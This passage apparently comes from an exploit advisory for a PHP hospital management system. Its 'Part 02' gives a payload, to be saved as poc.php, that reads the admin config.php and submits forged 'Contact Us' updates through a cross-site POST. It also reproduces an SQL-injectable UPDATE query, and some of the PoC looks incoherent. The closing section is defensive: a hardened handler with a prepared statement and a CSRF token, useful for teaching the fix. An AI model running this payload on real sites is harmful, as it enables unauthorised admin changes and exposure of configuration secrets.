{<br /> method: 'POST',<br /> body: formData,<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> alert('About Us content has been updated successfully.');<br /> console.log(data); // Handle the response from the server<br /> })<br /> .catch(error => {<br /> console.error('Error:', error);<br /> });<br /> }<br /> </script><br /> <style><br /> /* Center the form container */<br /> .editor-container {<br /> max-width: 800px;<br /> margin: 0 auto; /* Center horizontally */<br /> padding: 20px;<br /> text-align: center; /* Center the content inside */<br /> }<br /><br /> /* Ensure the textarea takes the full width */<br /> #pagedes {<br /> width: 100%;<br /> height: 300px;<br /> margin: 0 auto;<br /> }<br /> </style><br /></head><br 
/><body><br /> <div id="app"><br /> <div class="app-content"><br /> <div class="main-content"><br /> <div class="wrap-content container" id="container"><br /> <!-- Page Title Section --><br /> <section id="page-title"><br /> <div class="row"><br /> <div class="col-sm-8"><br /> <h1 class="mainTitle">Update the About Us Content</h1><br /> </div><br /> </div><br /> </section><br /> <!-- Form Section --><br /> <div class="container-fluid container-fullw bg-white"><br /> <div class="row"><br /> <div class="col-md-12"><br /> <!-- Centering the form using a wrapper div --><br /> <div class="editor-container"><br /> <form class="forms-sample" method="post" onsubmit="submitForm(event);"><br /> <div class="form-group"><br /> <label for="pagetitle">Page Title</label><br /> <input id="pagetitle" name="pagetitle" type="text" class="form-control" required><br /> </div><br /> <div class="form-group"><br /> <label for="pagedes">Page Description</label><br /> <!-- NicEdit will enhance this textarea --><br /> <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea><br /> </div><br /> <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button><br /> </form><br /> </div><br /> </div><br /> </div><br /> </div><br /> <!-- End Form Section --><br /> </div><br /> </div><br /> </div><br /> </div><br /> <!-- Footer --><br /></body><br /></html><br /><br />---------------------- [+] Part 02 : contact.php [+] --------------------<br /><br />[+] Line 4 : Make sure to include your database connection here<br /><br />[+] Line 60 : Send the form data using fetch API (Set your target url)<br /><br />[+] save payload as poc.php in your localhost path .<br /><br />[+] payload : <br /><br /><?php<br /><br />// address of the external server<br />$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';<br /><br />// fetch the data from the external server<br />$response = file_get_contents($url);<br /><br />// check that data was returned<br
/>if ($response !== FALSE) {<br /> // handle the data<br /> echo $response;<br />} else {<br /> echo 'حدث خطأ أثناء جلب البيانات.';<br />}<br /><br />if (isset($_POST['submit'])) {<br /> $pagetitle = $_POST['pagetitle'];<br /> $pagedes = $con->real_escape_string($_POST['pagedes']);<br /> $email = $con->real_escape_string($_POST['email']);<br /> $mobnum = $con->real_escape_string($_POST['mobnum']);<br /> <br /> $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");<br /><br /> if ($query) {<br /> echo '<script>alert("Contact Us has been updated.")</script>';<br /> } else {<br /> echo '<script>alert("Something Went Wrong. Please try again.")</script>';<br /> }<br /> exit;<br />}<br /><br />?><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Admin | Update Contact Us Content</title><br /> <!-- NicEdit Script --><br /> <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script><br /> <script type="text/javascript"><br /> bkLib.onDomLoaded(nicEditors.allTextAreas);<br /><br /> function submitForm(event) {<br /> event.preventDefault();<br /><br /> const pagetitle = document.getElementById('pagetitle').value;<br /> const pagedes = nicEditors.findEditor('pagedes').getContent();<br /> const email = document.getElementById('email').value;<br /> const mobnum = document.getElementById('mobnum').value;<br /><br /> const formData = new FormData();<br /> formData.append('pagetitle', pagetitle);<br /> formData.append('pagedes', pagedes);<br /> formData.append('email', email);<br /> formData.append('mobnum', mobnum);<br /> formData.append('submit', true);<br /><br /> fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {<br /> method: 'POST',<br /> body: formData,<br /> })<br /> .then(response => 
response.text())<br /> .then(data => {<br /> alert('Contact Us content has been updated successfully.');<br /> console.log(data);<br /> })<br /> .catch(error => {<br /> console.error('Error:', error);<br /> });<br /> }<br /> </script><br /> <style><br /> .editor-container {<br /> max-width: 800px;<br /> margin: 0 auto;<br /> padding: 20px;<br /> text-align: center;<br /> }<br /><br /> #pagedes {<br /> width: 100%;<br /> height: 300px;<br /> margin: 0 auto;<br /> }<br /> </style><br /></head><br /><body><br /> <div id="app"><br /> <div class="app-content"><br /> <div class="main-content"><br /> <div class="wrap-content container" id="container"><br /> <section id="page-title"><br /> <div class="row"><br /> <div class="col-sm-8"><br /> <h1 class="mainTitle">Admin | Update Contact Us Content</h1><br /> </div><br /> <ol class="breadcrumb"><br /> <li class="active"><br /> <span>Update Contact Us Content</span><br /> </li><br /> </ol><br /> </div><br /> </section><br /> <div class="container-fluid container-fullw bg-white"><br /> <div class="row"><br /> <div class="col-md-12"><br /> <div class="editor-container"><br /> <form class="forms-sample" method="post" onsubmit="submitForm(event);"><br /> <div class="form-group"><br /> <label for="pagetitle">Page Title</label><br /> <input id="pagetitle" name="pagetitle" type="text" class="form-control" required><br /> </div><br /> <div class="form-group"><br /> <label for="pagedes">Page Description</label><br /> <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea><br /> </div><br /> <div class="form-group"><br /> <label for="email">Email</label><br /> <input id="email" name="email" type="email" class="form-control" required><br /> </div><br /> <div class="form-group"><br /> <label for="mobnum">Mobile Number</label><br /> <input id="mobnum" name="mobnum" type="text" class="form-control" required><br /> </div><br /> <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button><br /> 
</form><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /></body><br /></html><br /></code></pre>
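The update handler reproduced in the PoC above concatenates `$_POST['pagetitle']` into the UPDATE without escaping and accepts any POST that carries `submit`, which is why a form served from another origin can drive it with the logged-in admin's cookies. The following is an added example, not code from the advisory or from the hospital management system itself: the same update step with a prepared statement and a per-session CSRF token. It assumes an open mysqli connection in `$con` and a session started by the application; the table and column names are the ones in the advisory's query, and `csrf_token` is a hypothetical field name.

```php
<?php
// Added example (not the advisory's or the HMS project's code): hardened form of the
// contact.php update handler. Assumed: $con is an open mysqli connection and the admin
// session is started by the application; table/column names follow the advisory's query.
declare(strict_types=1);

function csrf_token(): string
{
    // One random token per session; the form embeds it as a hidden field named
    // csrf_token, e.g. <input type="hidden" name="csrf_token" value="...">.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function update_contact_page(mysqli $con, array $post): bool
{
    // Reject requests without the session token; a cross-site POST cannot read it.
    if (!isset($post['csrf_token'], $_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], (string) $post['csrf_token'])) {
        return false;
    }
    // Validate the fields with a known shape before they reach the database.
    $email  = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    $mobnum = (string) ($post['mobnum'] ?? '');
    if ($email === false || !preg_match('/^\+?[0-9]{6,15}$/', $mobnum)) {
        return false;
    }
    $title = (string) ($post['pagetitle'] ?? '');
    $desc  = (string) ($post['pagedes'] ?? '');
    // Prepared statement: every value is bound as data, so a quote in the page title
    // (left unescaped in the original handler) can no longer alter the query structure.
    $stmt = $con->prepare('UPDATE tblpage SET PageTitle = ?, PageDescription = ?, '
        . 'Email = ?, MobileNumber = ? WHERE PageType = ?');
    if ($stmt === false) {
        return false;
    }
    $type = 'contactus';
    $stmt->bind_param('sssss', $title, $desc, $email, $mobnum, $type);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    echo update_contact_page($con, $_POST) ? 'Contact Us has been updated.' : 'Request rejected.';
}
```

The form that posts to this handler must include the hidden `csrf_token` field rendered from `csrf_token()`; a submission from the PoC page, which cannot obtain that value, is then refused before any query runs.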
